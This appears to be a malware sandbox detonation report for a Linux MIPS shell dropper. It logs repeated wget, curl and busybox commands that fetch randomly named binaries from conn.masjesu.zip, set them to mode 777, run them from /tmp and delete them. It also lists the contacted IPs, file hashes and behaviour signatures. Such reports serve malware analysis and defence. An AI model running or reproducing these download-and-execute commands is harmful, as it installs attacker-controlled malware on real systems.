[/bin/busybox wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/bin/chmod

[chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a

[./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/bin/rm

[rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/bin/chmod

[chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp

[./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/bin/rm

[rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/bin/chmod

[chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR

[./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/bin/rm

[rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/bin/chmod

[chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p

[./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/bin/rm

[rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/bin/chmod

[chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA

[./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/bin/rm

[rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/bin/chmod

[chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY

[./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/bin/rm

[rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/bin/chmod

[chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY

[./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/bin/rm

[rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/bin/chmod

[chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD

[./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/bin/rm

[rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/bin/chmod

[chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa

[./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/bin/rm

[rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/bin/chmod

[chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx

[./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/bin/rm

[rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/bin/chmod

[chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL

[./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/bin/rm

[rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/bin/chmod

[chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I

[./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

/bin/rm

[rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp

Files

/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-21 08:51

Reported

2024-11-21 08:56

Platform

debian9-mipsel-20240729-en

Max time kernel

71s

Max time network

72s

Command Line

[/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY N/A
N/A /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD N/A
N/A /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa N/A
N/A /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx N/A
N/A /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL N/A
N/A /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I N/A
N/A /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo N/A
N/A /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa N/A
N/A /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a N/A
N/A /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp N/A
N/A /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR N/A
N/A /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p N/A
N/A /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA N/A
N/A /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY N/A
N/A /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo N/A
N/A /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa N/A
N/A /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a N/A
N/A /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp N/A
N/A /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR N/A
N/A /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p N/A
N/A /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA N/A
N/A /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY N/A
N/A /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY N/A
N/A /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD N/A
N/A /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa N/A
N/A /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx N/A
N/A /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL N/A
N/A /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa /usr/bin/curl N/A
File opened for modification /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx /usr/bin/curl N/A
File opened for modification /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I /usr/bin/curl N/A
File opened for modification /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo /usr/bin/curl N/A
File opened for modification /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL /usr/bin/curl N/A
File opened for modification /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa /usr/bin/curl N/A
File opened for modification /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a /usr/bin/curl N/A
File opened for modification /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp /usr/bin/curl N/A
File opened for modification /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR /usr/bin/curl N/A
File opened for modification /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL /usr/bin/curl N/A
File opened for modification /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY /usr/bin/curl N/A
File opened for modification /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA /usr/bin/curl N/A
File opened for modification /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY /usr/bin/curl N/A
File opened for modification /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA /usr/bin/curl N/A
File opened for modification /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp /usr/bin/curl N/A
File opened for modification /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa /usr/bin/curl N/A
File opened for modification /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa /usr/bin/curl N/A
File opened for modification /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx /usr/bin/curl N/A
